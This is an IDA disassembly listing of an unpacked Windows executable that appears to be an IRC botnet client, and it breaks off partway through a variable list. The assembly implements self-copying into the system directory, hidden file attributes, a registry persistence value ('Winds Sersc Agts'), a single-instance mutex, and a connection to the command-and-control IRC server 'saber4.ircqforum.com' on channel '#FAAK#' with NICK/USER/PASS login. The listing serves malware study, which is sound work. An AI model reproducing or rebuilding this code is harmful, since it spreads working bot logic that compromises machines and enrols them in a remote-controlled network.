; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : DFC8D5572AD29A890BEE6F008EF8CBF2 ; File Name : u:\work\dfc8d5572ad29a890bee6f008ef8cbf2_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 400000 ; Section 1. (virtual address 00001000) ; Virtual size : 000C4000 ( 802816.) ; Section size in file : 000C4000 ( 802816.) ; Offset to raw data for section: 00001000 ; Flags E0000080: Bss Executable Readable Writable ; Alignment : default unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX0 segment para public 'CODE' use32 assume cs:UPX0 ;org 401000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401000 proc near ; CODE XREF: sub_401221+358p ; sub_41835A+1Ep var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push ebx push esi push edi mov edi, offset dword_429050 xor esi, esi mov ebx, offset aWindsSerscAgts ; "Winds Sersc Agts" loc_401013: ; CODE XREF: sub_401000+69j lea eax, [ebp+var_4] push esi push eax push esi push 0F003Fh push esi push esi push esi push dword ptr [edi+4] push dword ptr [edi] call ds:dword_4CB608 ; RegCreateKeyExA cmp [ebp+arg_0], esi jz short loc_40104D push [ebp+arg_0] call sub_41AFE0 pop ecx push eax push [ebp+arg_0] push 1 push esi push ebx push [ebp+var_4] call ds:dword_4CB678 ; RegSetValueExA jmp short loc_401057 ; --------------------------------------------------------------------------- loc_40104D: ; CODE XREF: sub_401000+2Fj push ebx push [ebp+var_4] call ds:dword_4CB5B8 ; RegDeleteValueA loc_401057: ; CODE XREF: sub_401000+4Bj push [ebp+var_4] call ds:dword_4CB630 ; RegCloseKey add edi, 8 cmp edi, offset dword_429068 jb short loc_401013 pop edi pop esi pop ebx leave retn sub_401000 endp ; =============== S U B R O U T I N E ======================================= sub_401070 proc near ; CODE XREF: sub_4010AB+56p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_4] mov edx, [esp+arg_0] push esi or esi, 0FFFFFFFFh test eax, eax jz short loc_4010A5 push ebx push edi lea edi, [eax] mov ecx, 0FFh loc_401089: ; CODE XREF: sub_401070+31j mov al, [edx] mov ebx, esi and eax, ecx and ebx, ecx xor eax, ebx shr esi, 8 mov eax, dword_427238[eax*4] xor esi, eax inc edx dec edi jnz short loc_401089 pop edi pop ebx loc_4010A5: ; CODE XREF: sub_401070+Ej mov eax, esi pop esi not eax retn sub_401070 endp ; =============== S U B R O U T I N E ======================================= sub_4010AB proc near ; CODE XREF: sub_4163FA+24Ap var_10 = dword ptr -10h arg_0 = dword ptr 4 push ebx push esi xor ebx, ebx push edi push ebx call sub_41B4D5 mov [esp+10h+var_10], offset dword_429068 push [esp+10h+arg_0] mov esi, eax call sub_41B4C2 mov edi, eax pop ecx test edi, edi pop ecx jz short loc_4010FA loc_4010D0: ; CODE XREF: sub_4010AB+4Dj test byte ptr [edi+0Ch], 10h jnz short loc_4010FE inc ebx push ebx push esi call sub_41B202 mov esi, eax pop ecx test esi, esi pop ecx jz short loc_4010FA push edi push 1 lea eax, [esi+ebx-1] push 1 push eax call sub_41B11A add esp, 10h jmp short loc_4010D0 ; --------------------------------------------------------------------------- loc_4010FA: ; CODE XREF: sub_4010AB+23j ; sub_4010AB+39j xor eax, eax jmp short loc_401119 ; --------------------------------------------------------------------------- loc_4010FE: ; CODE XREF: sub_4010AB+29j dec ebx push ebx push esi call sub_401070 push esi mov ebx, eax call sub_41B0B1 push edi call sub_41B05B add esp, 10h mov eax, ebx loc_401119: ; CODE XREF: sub_4010AB+51j pop edi pop esi pop ebx retn sub_4010AB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40111D proc near ; DATA XREF: sub_401221+14o var_268 = dword ptr -268h var_25C = byte ptr -25Ch var_158 = byte ptr -158h var_54 = dword ptr -54h var_48 = dword ptr -48h var_28 = dword ptr -28h var_24 = word ptr -24h var_10 = dword ptr -10h var_C = dword ptr -0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 25Ch push ebx push esi push edi push dword_43E59C call ds:dword_4CB6EC ; closesocket call sub_40B2C0 call ds:dword_4CB5AC ; WSACleanup call ds:dword_4CB5AC ; WSACleanup mov ebx, dword_427078 push 64h call ebx ; Sleep xor edi, edi push 10h lea eax, [ebp+var_10] push edi push eax call sub_41B590 push 44h lea eax, [ebp+var_54] pop esi push esi push edi push eax call sub_41B590 add esp, 18h mov [ebp+var_54], esi mov esi, 104h lea eax, [ebp+var_25C] push esi push eax mov [ebp+var_48], offset byte_43D808 mov [ebp+var_28], 1 mov [ebp+var_24], di call dword_427074 ; GetSystemDirectoryA lea eax, [ebp+var_158] push esi push eax push edi call dword_427070 ; GetModuleFileNameA lea eax, [ebp+var_10] push eax lea eax, [ebp+var_54] push eax lea eax, [ebp+var_25C] push eax push edi push 28h push 1 push edi lea eax, [ebp+var_158] push edi push eax push edi call dword_42706C ; CreateProcessA test eax, eax jz short loc_4011E2 push 64h call ebx ; Sleep push [ebp+var_10] mov esi, dword_427068 call esi ; CloseHandle push [ebp+var_C] call esi ; CloseHandle loc_4011E2: ; CODE XREF: sub_40111D+AFj mov eax, [ebp+arg_8] mov dword ptr [eax+0B0h], offset dword_43D800 mov eax, [esp+268h+var_268] mov large fs:0, eax add esp, 8 push edi call dword_427064 ; ExitProcess pop edi pop esi pop ebx loc_401205: ; DATA XREF: UPX0:00429004o jmp $+5 push 0FFFFh push 539h call sub_418685 pop ecx mov ds:dword_4CB390, eax pop ecx retn sub_40111D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401221 proc near ; CODE XREF: UPX0:0041D9FCp var_988 = byte ptr -988h var_884 = byte ptr -884h var_883 = byte ptr -883h var_6F4 = byte ptr -6F4h var_5F4 = byte ptr -5F4h var_4F0 = byte ptr -4F0h var_3F0 = byte ptr -3F0h var_2EC = byte ptr -2ECh var_1E8 = byte ptr -1E8h var_E4 = dword ptr -0E4h var_D8 = dword ptr -0D8h var_B8 = dword ptr -0B8h var_B4 = word ptr -0B4h var_A0 = byte ptr -0A0h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 988h push ebx xor ebx, ebx push esi push edi mov [ebp+var_8], ebx mov [ebp+var_C], ebx mov [ebp+var_4], offset sub_40111D push [ebp+var_4] push large dword ptr fs:0 mov large fs:0, esp mov esi, dword_4270A8 call esi ; GetTickCount xor edx, edx mov ecx, 3E8h div ecx mov ds:dword_4CB394, eax call esi ; GetTickCount push eax call sub_41B8D8 pop ecx call sub_409B13 push 2 call ds:dword_4CB700 ; SetErrorMode push 7530h push offset aQufpoius ; "qufpoius" push ebx push ebx call dword_4270A4 ; CreateMutexA push eax call dword_4270A0 ; WaitForSingleObject cmp eax, 102h jnz short loc_4012A1 push 1 call dword_427064 ; ExitProcess loc_4012A1: ; CODE XREF: sub_401221+76j lea eax, [ebp+var_884] push eax push 202h call ds:dword_4CB5C4 ; WSAStartup cmp eax, ebx jnz loc_4017E4 cmp [ebp+var_884], 2 jnz loc_4017DE xor eax, eax mov al, [ebp+var_883] cmp al, 2 jnz loc_4017DE mov esi, 104h lea eax, [ebp+var_3F0] push esi push eax call dword_427074 ; GetSystemDirectoryA lea eax, [ebp+var_2EC] push esi push eax push ebx call dword_42709C ; GetModuleHandleA push eax call dword_427070 ; GetModuleFileNameA lea eax, [ebp+var_4F0] push eax lea eax, [ebp+var_6F4] push eax push ebx lea eax, [ebp+var_2EC] push ebx push eax call sub_41B9D1 add esp, 14h lea eax, [ebp+var_4F0] push eax lea eax, [ebp+var_6F4] push eax push offset dword_429AD0 lea eax, [ebp+var_5F4] push esi push eax call sub_41B980 lea eax, [ebp+var_3F0] push eax lea eax, [ebp+var_2EC] push eax call sub_41B900 add esp, 1Ch test eax, eax jnz loc_401516 cmp dword_42908C, ebx mov esi, offset byte_429110 jz short loc_40139C push esi xor edi, edi call sub_41AFE0 sub eax, 4 pop ecx jz short loc_40139C loc_401379: ; CODE XREF: sub_401221+179j call sub_41B8E2 push 1Ah cdq pop ecx idiv ecx push esi add dl, 61h mov byte_429110[edi], dl inc edi call sub_41AFE0 sub eax, 4 pop ecx cmp edi, eax jb short loc_401379 loc_40139C: ; CODE XREF: sub_401221+148j ; sub_401221+156j lea eax, [ebp+var_3F0] push esi push eax lea eax, [ebp+var_1E8] push offset dword_429AC8 push eax call sub_41B886 add esp, 10h lea eax, [ebp+var_1E8] push eax call dword_427098 ; GetFileAttributesA cmp eax, 0FFFFFFFFh jz short loc_4013DC lea eax, [ebp+var_1E8] push 80h push eax call dword_427094 ; SetFileAttributesA loc_4013DC: ; CODE XREF: sub_401221+1A7j mov esi, dword_427090 lea eax, [ebp+var_1E8] push ebx push eax lea eax, [ebp+var_2EC] xor edi, edi push eax loc_4013F3: ; CODE XREF: sub_401221+209j call esi ; CopyFileA test eax, eax jnz short loc_40142C call dword_42708C ; RtlGetLastWin32Error cmp edi, ebx jnz short loc_40142C cmp eax, 20h jz short loc_40140D cmp eax, 5 jnz short loc_40142C loc_40140D: ; CODE XREF: sub_401221+1E5j push 1 pop edi push 3A98h call dword_427078 ; Sleep lea eax, [ebp+var_1E8] push ebx push eax lea eax, [ebp+var_2EC] push eax jmp short loc_4013F3 ; --------------------------------------------------------------------------- loc_40142C: ; CODE XREF: sub_401221+1D6j ; sub_401221+1E0j ... lea eax, [ebp+var_1E8] push eax call sub_418294 pop ecx lea eax, [ebp+var_1E8] push 7 push eax call dword_427094 ; SetFileAttributesA push 10h lea eax, [ebp+var_20] push ebx push eax call sub_41B590 push 44h lea eax, [ebp+var_E4] pop esi push esi push ebx push eax call sub_41B590 add esp, 18h mov [ebp+var_E4], esi mov [ebp+var_D8], offset byte_43D808 mov [ebp+var_B4], bx push 1 pop esi mov [ebp+var_B8], esi call dword_427088 ; GetCurrentProcessId push eax push esi push 100000h call dword_427084 ; OpenProcess lea ecx, [ebp+var_2EC] push ecx push eax lea eax, [ebp+var_1E8] push eax lea eax, [ebp+var_988] push offset dword_429ABC push eax call sub_41B886 add esp, 14h lea eax, [ebp+var_20] push eax lea eax, [ebp+var_E4] push eax lea eax, [ebp+var_3F0] push eax push ebx push 28h push esi push ebx lea eax, [ebp+var_988] push ebx push eax lea eax, [ebp+var_1E8] push eax call dword_42706C ; CreateProcessA test eax, eax jz short loc_401516 push 0C8h call dword_427078 ; Sleep push [ebp+var_20] mov esi, dword_427068 call esi ; CloseHandle push [ebp+var_1C] call esi ; CloseHandle call ds:dword_4CB5AC ; WSACleanup push ebx call dword_427064 ; ExitProcess loc_401516: ; CODE XREF: sub_401221+137j ; sub_401221+2CBj cmp ds:dword_4DB974, 2 jle short loc_401562 mov eax, ds:dword_4DB978 push dword ptr [eax+4] call sub_41B779 pop ecx mov esi, eax push 0FFFFFFFFh push esi call dword_4270A0 ; WaitForSingleObject push esi call dword_427068 ; CloseHandle mov eax, ds:dword_4DB978 cmp [eax+8], ebx jz short loc_401562 push 7D0h call dword_427078 ; Sleep mov eax, ds:dword_4DB978 push dword ptr [eax+8] call dword_427080 ; DeleteFileA loc_401562: ; CODE XREF: sub_401221+2FCj ; sub_401221+326j cmp dword_429090, ebx jz short loc_40157F cmp ds:dword_4CB724, ebx jnz short loc_40157F lea eax, [ebp+var_5F4] push eax call sub_401000 pop ecx loc_40157F: ; CODE XREF: sub_401221+347j ; sub_401221+34Fj lea eax, [ebp+var_A0] push offset dword_429AA0 push eax call sub_41B886 push ebx lea eax, [ebp+var_A0] push ebx push eax call sub_40B0F7 lea eax, [ebp+var_A0] push eax call sub_4151AD push 0B80h push ebx push offset dword_43D810 call sub_41B590 add esp, 24h lea eax, [ebp+var_A0] push offset unk_429A7C push eax call sub_41B886 push ebx lea eax, [ebp+var_A0] push 1 push eax call sub_40B0F7 add esp, 14h mov esi, eax mov edi, dword_42707C lea eax, [ebp+var_8] push eax push ebx push ebx push offset sub_419A01 push ebx push ebx call edi ; CreateThread imul esi, 234h cmp eax, ebx mov dword_43E5A4[esi], eax jnz short loc_401622 call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_A0] push offset unk_429A3C push eax call sub_41B886 add esp, 0Ch loc_401622: ; CODE XREF: sub_401221+3E4j lea eax, [ebp+var_A0] push eax call sub_4151AD push 2 call sub_40B33F pop ecx test eax, eax pop ecx jnz short loc_4016A7 lea eax, [ebp+var_A0] push offset dword_429A10 push eax call sub_41B886 push ebx lea eax, [ebp+var_A0] push 2 push eax call sub_40B0F7 add esp, 14h mov esi, eax lea eax, [ebp+var_8] push eax push ebx push esi push offset sub_4101FD push ebx push ebx call edi ; CreateThread imul esi, 234h cmp eax, ebx mov dword_43E5A4[esi], eax jnz short loc_40169A call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_A0] push offset dword_4299DC push eax call sub_41B886 add esp, 0Ch loc_40169A: ; CODE XREF: sub_401221+45Cj lea eax, [ebp+var_A0] push eax call sub_4151AD pop ecx loc_4016A7: ; CODE XREF: sub_401221+418j call sub_41B8E2 push 7Fh and eax, 3 push offset aSaber4_ircqfor ; "saber4.ircqforum.com" push offset dword_4CB39C mov ds:dword_4CB508, eax call sub_41B5F0 mov eax, dword_42906C push 3Fh mov edi, offset dword_4CB41C push offset aFaak ; "#FAAK#" push edi mov ds:dword_4CB4EC, eax call sub_41B5F0 push 3Fh mov esi, offset dword_4CB45C push offset aSaad_ ; "saad." push esi call sub_41B5F0 add esp, 24h mov ds:dword_4CB4F0, ebx loc_4016FC: ; CODE XREF: sub_401221+563j ; sub_401221+56Ej ... mov [ebp+var_4], ebx loc_4016FF: ; CODE XREF: sub_401221+517j push offset dword_4CB398 mov ds:dword_4CB504, ebx call sub_4017ED cmp eax, 2 mov [ebp+var_10], eax jz loc_4017D9 cmp ds:dword_4CB504, ebx jz short loc_401726 dec [ebp+var_4] loc_401726: ; CODE XREF: sub_401221+500j push 0BB8h call dword_427078 ; Sleep inc [ebp+var_4] cmp [ebp+var_4], 6 jl short loc_4016FF cmp [ebp+var_10], 2 jz loc_4017D9 cmp [ebp+var_C], ebx jz short loc_401789 push 7Fh push offset aSaber4_ircqfor ; "saber4.ircqforum.com" push offset dword_4CB39C call sub_41B5F0 mov eax, dword_42906C push 3Fh push offset aFaak ; "#FAAK#" push edi mov ds:dword_4CB4EC, eax call sub_41B5F0 push 3Fh push offset aSaad_ ; "saad." push esi call sub_41B5F0 add esp, 24h mov [ebp+var_C], ebx jmp loc_4016FC ; --------------------------------------------------------------------------- loc_401789: ; CODE XREF: sub_401221+526j cmp byte_4290EC, bl jz loc_4016FC push 7Fh push offset byte_4290EC push offset dword_4CB39C call sub_41B5F0 mov eax, dword_429070 push 3Fh push offset aFaak_0 ; "#FAAK#" push edi mov ds:dword_4CB4EC, eax call sub_41B5F0 push 3Fh push offset aSaad__0 ; "saad." push esi call sub_41B5F0 add esp, 24h mov [ebp+var_C], 1 jmp loc_4016FC ; --------------------------------------------------------------------------- loc_4017D9: ; CODE XREF: sub_401221+4F4j ; sub_401221+51Dj call sub_40B2C0 loc_4017DE: ; CODE XREF: sub_401221+A1j ; sub_401221+B1j call ds:dword_4CB5AC ; WSACleanup loc_4017E4: ; CODE XREF: sub_401221+94j pop edi pop esi xor eax, eax pop ebx leave retn 10h sub_401221 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4017ED proc near ; CODE XREF: sub_401221+4E9p ; DATA XREF: sub_401ACD+662Bo var_190 = dword ptr -190h var_18C = byte ptr -18Ch var_10C = byte ptr -10Ch var_CC = byte ptr -0CCh var_8C = byte ptr -8Ch var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_2C = byte ptr -2Ch var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 190h mov eax, [ebp+arg_0] push esi push edi push 59h pop ecx mov esi, eax lea edi, [ebp+var_190] rep movsd mov dword ptr [eax+160h], 1 loc_401812: ; CODE XREF: sub_4017ED+E6j ; sub_4017ED+136j ... push 10h lea eax, [ebp+var_10] push 0 push eax call sub_41B590 add esp, 0Ch mov [ebp+var_10], 2 push [ebp+var_3C] call ds:dword_4CB654 ; htons mov [ebp+var_E], ax lea eax, [ebp+var_18C] push eax call sub_40AAFA test eax, eax pop ecx mov [ebp+var_C], eax jz loc_40193F push 1Ch lea eax, [ebp+var_2C] push 0 push eax call sub_41B590 push 0 lea eax, [ebp+var_2C] push dword_4290A0 push dword_42909C push eax call sub_40B08E mov edi, eax mov eax, [ebp+var_34] imul eax, 234h push 1Bh add eax, offset byte_43E5A8 push edi push eax call sub_41B5F0 add esp, 28h push 6 push 1 push 2 call ds:dword_4CB6D4 ; socket mov esi, eax mov eax, [ebp+var_34] imul eax, 234h push 10h mov dword_43E59C[eax], esi lea eax, [ebp+var_10] push eax push esi call ds:dword_4CB5FC ; connect cmp eax, 0FFFFFFFFh jnz short loc_4018D8 push esi call ds:dword_4CB6EC ; closesocket call sub_40AB23 push 7D0h loc_4018CD: ; CODE XREF: sub_4017ED+146j call dword_427078 ; Sleep jmp loc_401812 ; --------------------------------------------------------------------------- loc_4018D8: ; CODE XREF: sub_4017ED+CDj lea eax, [ebp+var_18C] push eax push offset unk_429AD8 call sub_415221 push [ebp+var_38] lea eax, [ebp+var_18C] push eax lea eax, [ebp+var_8C] push eax lea eax, [ebp+var_CC] push [ebp+var_190] push edi push eax lea eax, [ebp+var_10C] push eax push esi call sub_401955 add esp, 28h mov edi, eax push esi call ds:dword_4CB6EC ; closesocket test edi, edi jz loc_401812 cmp edi, 1 jnz short loc_401935 push 0DBBA0h jmp short loc_4018CD ; --------------------------------------------------------------------------- loc_401935: ; CODE XREF: sub_4017ED+13Fj cmp edi, 2 jz short loc_401943 jmp loc_401812 ; --------------------------------------------------------------------------- loc_40193F: ; CODE XREF: sub_4017ED+5Aj xor eax, eax jmp short loc_40194F ; --------------------------------------------------------------------------- loc_401943: ; CODE XREF: sub_4017ED+14Bj push [ebp+var_34] call sub_40B413 pop ecx push 2 pop eax loc_40194F: ; CODE XREF: sub_4017ED+154j pop edi pop esi leave retn 4 sub_4017ED endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401955 proc near ; CODE XREF: sub_4017ED+123p var_1A90 = byte ptr -1A90h var_A90 = byte ptr -0A90h var_2C0 = byte ptr -2C0h var_140 = byte ptr -140h var_A0 = byte ptr -0A0h var_20 = byte ptr -20h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_18 = dword ptr 20h arg_1C = dword ptr 24h push ebp mov ebp, esp mov eax, 1A90h call sub_41BB20 push ebx push esi push edi xor ebx, ebx push 3 mov [ebp+var_8], ebx lea eax, [ebp+var_2C0] pop ecx loc_401973: ; CODE XREF: sub_401955+26j mov [eax], bl add eax, 80h dec ecx jnz short loc_401973 cmp ds:byte_4CB500, bl jz short loc_40199A push offset byte_4CB500 push offset aPassS ; "PASS %s\r\n" push [ebp+arg_0] call sub_409A2D add esp, 0Ch loc_40199A: ; CODE XREF: sub_401955+2Ej push [ebp+arg_C] lea eax, [ebp+var_20] push ebx push ebx push 2 push eax call sub_40B08E add esp, 10h push eax lea eax, [ebp+var_A0] push [ebp+arg_C] push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n" push eax call sub_41B886 add esp, 14h lea eax, [ebp+var_A0] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_A0] push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jnz short loc_401A04 push [ebp+arg_0] call ds:dword_4CB6EC ; closesocket push 1388h call dword_427078 ; Sleep loc_4019FD: ; CODE XREF: sub_401955+D9j ; sub_401955+153j xor eax, eax loc_4019FF: ; CODE XREF: sub_401955+173j pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_401A04: ; CODE XREF: sub_401955+92j ; sub_401955+F8j ... mov esi, 1000h lea eax, [ebp+var_1A90] push esi push ebx push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_1A90] push ebx push esi push eax push [ebp+arg_0] call ds:dword_4CB66C ; recv test eax, eax jle short loc_4019FD lea eax, [ebp+var_A90] push eax lea eax, [ebp+var_1A90] push eax call sub_417F80 pop ecx cmp eax, ebx pop ecx mov [ebp+var_C], eax mov [ebp+var_4], ebx jle short loc_401A04 lea edi, [ebp+var_A90] loc_401A55: ; CODE XREF: sub_401955+165j push 1 pop esi loc_401A58: ; CODE XREF: sub_401955+144j push [ebp+arg_1C] lea eax, [ebp+var_8] push esi push eax lea eax, [ebp+var_140] push eax lea eax, [ebp+var_2C0] push eax push [ebp+arg_18] push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] push dword ptr [edi] call sub_401ACD add esp, 2Ch dec eax mov esi, eax cmp esi, ebx jle short loc_401A9B push 7D0h call dword_427078 ; Sleep jmp short loc_401A58 ; --------------------------------------------------------------------------- loc_401A9B: ; CODE XREF: sub_401955+137j cmp esi, 0FFFFFFFDh jz short loc_401AC5 cmp esi, 0FFFFFFFEh jz short loc_401AC1 cmp esi, 0FFFFFFFFh jz loc_4019FD inc [ebp+var_4] add edi, 4 mov eax, [ebp+var_4] cmp eax, [ebp+var_C] jl short loc_401A55 jmp loc_401A04 ; --------------------------------------------------------------------------- loc_401AC1: ; CODE XREF: sub_401955+14Ej push 1 jmp short loc_401AC7 ; --------------------------------------------------------------------------- loc_401AC5: ; CODE XREF: sub_401955+149j push 2 loc_401AC7: ; CODE XREF: sub_401955+16Ej pop eax jmp loc_4019FF sub_401955 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401ACD proc near ; CODE XREF: sub_401955+12Ap var_5D88 = byte ptr -5D88h var_5988 = byte ptr -5988h var_5588 = byte ptr -5588h var_53F8 = byte ptr -53F8h var_51F8 = byte ptr -51F8h var_50F4 = byte ptr -50F4h var_4FF4 = byte ptr -4FF4h var_4EF0 = byte ptr -4EF0h var_4DF0 = byte ptr -4DF0h var_4CF0 = byte ptr -4CF0h var_4BF0 = byte ptr -4BF0h var_4AF0 = byte ptr -4AF0h var_48F0 = byte ptr -48F0h var_47EC = byte ptr -47ECh var_46EC = byte ptr -46ECh var_45EC = byte ptr -45ECh var_4588 = byte ptr -4588h var_4488 = byte ptr -4488h var_4288 = byte ptr -4288h var_4188 = byte ptr -4188h var_4088 = byte ptr -4088h var_3F88 = dword ptr -3F88h var_3F84 = byte ptr -3F84h var_3F04 = byte ptr -3F04h var_3E00 = byte ptr -3E00h var_3CFC = dword ptr -3CFCh var_3CF8 = dword ptr -3CF8h var_3CF4 = dword ptr -3CF4h var_3CF0 = dword ptr -3CF0h var_3CEC = dword ptr -3CECh var_3CE8 = dword ptr -3CE8h var_3CE4 = byte ptr -3CE4h var_3C64 = byte ptr -3C64h var_3BE4 = byte ptr -3BE4h var_3B64 = byte ptr -3B64h var_3AE4 = byte ptr -3AE4h var_3A64 = dword ptr -3A64h var_3A60 = dword ptr -3A60h var_3A5C = dword ptr -3A5Ch var_3A58 = dword ptr -3A58h var_3A54 = byte ptr -3A54h var_37CD = byte ptr -37CDh var_37CC = byte ptr -37CCh var_36C8 = dword ptr -36C8h var_36C0 = dword ptr -36C0h var_36BC = dword ptr -36BCh var_36B8 = dword ptr -36B8h var_36B4 = dword ptr -36B4h var_36AC = dword ptr -36ACh var_36A8 = dword ptr -36A8h var_36A4 = byte ptr -36A4h var_3624 = byte ptr -3624h var_35A4 = byte ptr -35A4h var_3524 = byte ptr -3524h var_34A4 = dword ptr -34A4h var_34A0 = dword ptr -34A0h var_349C = dword ptr -349Ch var_3498 = dword ptr -3498h var_3494 = dword ptr -3494h var_3490 = byte ptr -3490h var_3410 = byte ptr -3410h var_3390 = byte ptr -3390h var_3310 = byte ptr -3310h var_3290 = dword ptr -3290h var_328C = dword ptr -328Ch var_3288 = dword ptr -3288h var_3284 = dword ptr -3284h var_3280 = dword ptr -3280h var_327C = byte ptr -327Ch var_31FC = byte ptr -31FCh var_317C = byte ptr -317Ch var_30FC = byte ptr -30FCh var_307C = dword ptr -307Ch var_3078 = dword ptr -3078h var_3074 = dword ptr -3074h var_3070 = dword ptr -3070h var_306C = dword ptr -306Ch var_3068 = byte ptr -3068h var_2FE8 = byte ptr -2FE8h var_2F68 = byte ptr -2F68h var_2EE8 = byte ptr -2EE8h var_2E68 = dword ptr -2E68h var_2E64 = dword ptr -2E64h var_2E60 = dword ptr -2E60h var_2E5C = dword ptr -2E5Ch var_2E58 = byte ptr -2E58h var_2D54 = dword ptr -2D54h var_2D50 = byte ptr -2D50h var_2C4C = byte ptr -2C4Ch var_2B48 = dword ptr -2B48h var_2B44 = dword ptr -2B44h var_2B40 = dword ptr -2B40h var_2B3C = byte ptr -2B3Ch var_2ABC = dword ptr -2ABCh var_2AB8 = dword ptr -2AB8h var_2AB4 = dword ptr -2AB4h var_2AB0 = dword ptr -2AB0h var_2AA8 = byte ptr -2AA8h var_2990 = byte ptr -2990h var_2910 = dword ptr -2910h var_290C = dword ptr -290Ch var_2908 = dword ptr -2908h var_2904 = dword ptr -2904h var_2900 = dword ptr -2900h var_28FC = dword ptr -28FCh var_28F8 = byte ptr -28F8h var_2878 = byte ptr -2878h var_2778 = byte ptr -2778h var_2678 = dword ptr -2678h var_2674 = dword ptr -2674h var_2670 = dword ptr -2670h var_266C = dword ptr -266Ch var_2668 = dword ptr -2668h var_2664 = dword ptr -2664h var_2660 = dword ptr -2660h var_265C = dword ptr -265Ch var_2658 = dword ptr -2658h var_2654 = dword ptr -2654h var_2650 = byte ptr -2650h var_25D0 = byte ptr -25D0h var_24D0 = byte ptr -24D0h var_23D0 = dword ptr -23D0h var_23CC = dword ptr -23CCh var_23C8 = dword ptr -23C8h var_23C4 = dword ptr -23C4h var_23C0 = dword ptr -23C0h var_23BC = dword ptr -23BCh var_23B8 = dword ptr -23B8h var_23B4 = dword ptr -23B4h var_23B0 = dword ptr -23B0h var_23AC = dword ptr -23ACh var_23A8 = byte ptr -23A8h var_2328 = byte ptr -2328h var_22A8 = byte ptr -22A8h var_2228 = dword ptr -2228h var_2224 = dword ptr -2224h var_2220 = dword ptr -2220h var_221C = dword ptr -221Ch var_2218 = dword ptr -2218h var_2214 = byte ptr -2214h var_2194 = byte ptr -2194h var_2114 = byte ptr -2114h var_2094 = dword ptr -2094h var_2090 = dword ptr -2090h var_208C = dword ptr -208Ch var_2088 = dword ptr -2088h var_2084 = dword ptr -2084h var_2080 = byte ptr -2080h var_2000 = byte ptr -2000h var_1F80 = byte ptr -1F80h var_1F00 = dword ptr -1F00h var_1EFC = dword ptr -1EFCh var_1EF8 = dword ptr -1EF8h var_1EF4 = dword ptr -1EF4h var_1EF0 = dword ptr -1EF0h var_1EEC = byte ptr -1EECh var_1DEC = byte ptr -1DECh var_1D6C = dword ptr -1D6Ch var_1D64 = dword ptr -1D64h var_1D60 = dword ptr -1D60h var_1D5C = dword ptr -1D5Ch var_1D58 = dword ptr -1D58h var_1D54 = dword ptr -1D54h var_1D50 = dword ptr -1D50h var_1D48 = byte ptr -1D48h var_1D34 = byte ptr -1D34h var_1C30 = byte ptr -1C30h var_1BAC = dword ptr -1BACh var_1BA8 = dword ptr -1BA8h var_1BA4 = dword ptr -1BA4h var_1BA0 = dword ptr -1BA0h var_1B9C = dword ptr -1B9Ch var_1B94 = byte ptr -1B94h var_1B80 = byte ptr -1B80h var_1A7C = byte ptr -1A7Ch var_19FC = dword ptr -19FCh var_19F8 = dword ptr -19F8h var_19F4 = dword ptr -19F4h var_19F0 = dword ptr -19F0h var_19EC = dword ptr -19ECh var_19E8 = dword ptr -19E8h var_19E4 = byte ptr -19E4h var_1964 = byte ptr -1964h var_1924 = byte ptr -1924h var_1824 = dword ptr -1824h var_1820 = dword ptr -1820h var_1814 = dword ptr -1814h var_1810 = dword ptr -1810h var_180C = dword ptr -180Ch var_1808 = byte ptr -1808h var_17D0 = byte ptr -17D0h var_17B4 = byte ptr -17B4h var_177C = byte ptr -177Ch var_1778 = byte ptr -1778h var_16F8 = byte ptr -16F8h var_16B8 = byte ptr -16B8h var_1628 = dword ptr -1628h var_1624 = dword ptr -1624h var_1620 = dword ptr -1620h var_161C = dword ptr -161Ch var_1618 = dword ptr -1618h var_1614 = byte ptr -1614h var_1594 = byte ptr -1594h var_1514 = dword ptr -1514h var_1510 = dword ptr -1510h var_150C = dword ptr -150Ch var_1508 = dword ptr -1508h var_1504 = byte ptr -1504h var_14F4 = byte ptr -14F4h var_1474 = byte ptr -1474h var_13F4 = dword ptr -13F4h var_13EC = dword ptr -13ECh var_13E8 = dword ptr -13E8h var_13E4 = dword ptr -13E4h var_13E0 = dword ptr -13E0h 